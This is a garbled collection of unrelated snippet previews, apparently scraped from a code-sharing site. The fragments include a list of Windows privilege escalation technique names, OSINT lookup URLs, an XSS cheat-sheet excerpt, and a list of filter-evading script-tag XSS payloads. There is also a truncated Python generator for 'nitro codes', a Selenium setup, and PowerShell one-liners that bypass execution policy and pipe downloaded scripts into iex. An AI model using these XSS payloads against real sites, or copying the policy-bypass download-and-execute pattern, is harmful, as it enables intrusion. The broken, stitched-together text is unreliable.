Windows Privilege Escalation Techniques
- Buffer Overflow
- DLL Injection
- DLL Hijacking
- Token Manipulation
- Insecure Files Permission
- Insecure Folders Permission
- Insecure Service Permission
- Insecure Registery Permission
Udemy %100 free courses |
https://censys.io | |
https://shodan.io | |
https://viz.greynoise.io | |
https://zoomeye.org | |
https://netograph.io | |
https://wigle.net | |
https://intelx.io | |
https://fofa.so | |
https://hunter.io |
XSS attacks are from http://ha.ckers.org/xss.html. | |
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed. | |
Test | |
Name Raw Output Render | |
XSS Locator | |
';alert(String.fromCharCode( » | |
88,83,83))//\';alert(String. » | |
fromCharCode(88,83,83))//";a » |
1: Username (Alias) | |
http://namechk.com/ | |
http://knowem.com/ | |
http://www.namecheckr.com/ | |
http://checkusernames.com/ | |
http://usersherlock.com/ | |
https://www.usersearch.org/ | |
2: Archives | |
https://archive.org/index.php |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
import random | |
import string | |
from colorama import init, Fore, Back, Style | |
import colorama | |
init(convert=True) | |
f = open('nitro_codes.txt', 'a') | |
amount = int(input()) | |
fix = 1 |
from selenium import webdriver | |
from selenium.webdriver.chrome.options import Options | |
chrome_options = Options() | |
# chrome_options.add_argument("--disable-extensions") | |
# chrome_options.add_argument("--headless") | |
chrome_options.add_argument("--mute-audio") | |
chrome_options.add_argument('--ignore-certificate-errors') |
Windows Privilege Escalation Techniques
WINDOWS | |
Powershell admin olarak calistirdiktan sonra; | |
1- Chocolatey | |
Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')) | |
2- Holochain | |
Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/holochain/hcup/master/hcup-bootstrap.ps1')) |
Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency.
– The Git website
Choose one of the following options.